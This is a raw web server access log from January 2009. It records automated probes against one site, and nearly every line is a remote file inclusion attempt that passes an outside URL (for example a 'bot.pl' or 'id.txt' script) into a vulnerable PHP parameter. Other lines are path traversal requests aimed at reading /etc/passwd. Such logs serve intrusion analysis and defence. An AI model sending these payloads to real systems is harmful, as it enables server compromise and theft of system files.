72.47.202.35 - - [30/Jan/2009:10:24:49 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.35 - - [30/Jan/2009:10:24:50 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.35 - - [30/Jan/2009:10:24:50 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:24:53 -0800] "GET /board//include/print_category.php?setup[use_category]=1&dir=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:10:25:17 -0800] "GET /logs/access_080913.log%20%20/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:25:28 -0800] "GET /logs//apboard/index.php?APB_rp=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:25:28 -0800] "GET /logs/access_090103.log//apboard/index.php?APB_rp=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:25:29 -0800] "GET /apboard/index.php?APB_rp=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:26:10 -0800] "GET /logs/access_080421.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:26:10 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:26:11 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:26:43 -0800] "GET /logs/access_090108.log//apboard/index.php?APB_rp=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:27:00 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:27:00 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
61.247.173.202 - - [30/Jan/2009:10:27:18 -0800] "GET /logs/access_080806.log%20%20/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.149.228.44 - - [30/Jan/2009:10:27:25 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.149.228.44 - - [30/Jan/2009:10:27:27 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 200 95374 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:27:50 -0800] "GET /logs/access_080502.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:27:50 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:27:55 -0800] "GET /logs/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:27:55 -0800] "GET /logs/access_080529.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:27:55 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:27:55 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:27:58 -0800] "GET /logs/access_080529.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:27:58 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:27:59 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:28:03 -0800] "GET /logs/access_080529.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:28:03 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:28:03 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:28:05 -0800] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:28:10 -0800] "GET /logs/access_080502.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:28:10 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:28:10 -0800] "GET /logs/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:28:12 -0800] "GET /logs/access_080524.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:28:13 -0800] "GET /logs/access_080515.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:28:15 -0800] "GET /logs/access_080515.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:28:17 -0800] "GET /logs/access_080529.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:28:18 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:28:18 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:10:28:29 -0800] "GET /logs/access_080806.log%20%20/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:28:30 -0800] "GET /logs/access_080216.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:28:31 -0800] "GET /logs/access_080216.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.97.227.55 - - [30/Jan/2009:10:28:36 -0800] "GET /logs/access_080216.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mariobrosp3/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:28:40 -0800] "GET /logs/access_080621.log%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:28:54 -0800] "GET /logs/access_080216.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:29:05 -0800] "GET /logs/access_080501.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:29:17 -0800] "GET /logs/access_081220.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.126.12.7 - - [30/Jan/2009:10:29:43 -0800] "GET /logs//?mosConfig_absolute_path=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 200 84609 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
121.126.12.7 - - [30/Jan/2009:10:29:44 -0800] "GET /?mosConfig_absolute_path=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 200 94789 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:30:44 -0800] "GET /logs/access_080314.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:30:48 -0800] "GET /logs/access_080322.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:30:48 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:30:49 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 200 95085 "-" "libwww-perl/5.812" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:31:07 -0800] "GET /logs/access_080817.log/popup.php?path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:31:07 -0800] "GET /logs/popup.php?path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:31:07 -0800] "GET /popup.php?path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:31:10 -0800] "GET /logs/access_090103.log//apboard/index.php?APB_rp=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:31:13 -0800] "GET /logs//apboard/index.php?APB_rp=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:31:16 -0800] "GET /apboard/index.php?APB_rp=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:31:23 -0800] "GET /logs/access_090108.log//apboard/index.php?APB_rp=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:31:34 -0800] "GET /logs/access_080526.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:31:34 -0800] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:31:34 -0800] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:31:35 -0800] "GET /logs/access_080524.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:31:37 -0800] "GET /logs/access_080322.log%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.92 - - [30/Jan/2009:10:31:46 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/lucasnoki/botscan/newbotscanbag1.txt? HTTP/1.1" 200 95551 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:10:31:53 -0800] "GET /logs/access_080713.log//index.php?include=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:10:31:54 -0800] "GET /index.php?include=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 200 94817 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:10:31:54 -0800] "GET /logs//index.php?include=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.35 - - [30/Jan/2009:10:32:14 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.22 - - [30/Jan/2009:10:32:27 -0800] "GET /logs/access_080227.log//poll/png.php?include_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.22 - - [30/Jan/2009:10:32:27 -0800] "GET /poll/png.php?include_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.22 - - [30/Jan/2009:10:32:28 -0800] "GET /logs//poll/png.php?include_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:32:47 -0800] "GET /logs/access_080817.log/popup.php?path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:32:47 -0800] "GET /logs/popup.php?path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:32:47 -0800] "GET /popup.php?path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:32:52 -0800] "GET /logs/access_080817.log/popup.php?path=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:32:52 -0800] "GET /logs/popup.php?path=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:32:52 -0800] "GET /popup.php?path=http://www.tpshanshui.com.tw/mine/.../id/raids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.94.174.158 - - [30/Jan/2009:10:32:53 -0800] "GET /logs/access_080905.log//index.php?include=http://www.kimstroy.by//assets/images/t.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:10:33:49 -0800] "GET /logs/access_081129.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:10:33:49 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:10:33:49 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:10:33:54 -0800] "GET /logs/access_080602.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:34:01 -0800] "GET /logs/access_080129.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:34:01 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:34:02 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:34:26 -0800] "GET /logs/access_080913.log%20%20/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:35:30 -0800] "GET /logs/access_080806.log%20%20/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:35:55 -0800] "GET /logs/access_081227.log//apboard/index.php?APB_rp=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:37:00 -0800] "GET /logs/access_080601.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:10:37:41 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:10:37:41 -0800] "GET /logs/access_080526.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:10:37:41 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:10:37:42 -0800] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:10:38:04 -0800] "GET /logs/access_081124.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:38:20 -0800] "GET /logs/access_080615.log/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:38:20 -0800] "GET /logs/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:38:20 -0800] "GET /toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:38:21 -0800] "GET /logs/access_080702.log/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:38:22 -0800] "GET /logs/access_080615.log/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:38:22 -0800] "GET /logs/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:38:22 -0800] "GET /toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:38:22 -0800] "GET /logs/access_080702.log/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.162.139.20 - - [30/Jan/2009:10:38:22 -0800] "GET /logs/access_081124.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.welcometoreason.com/idrose.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
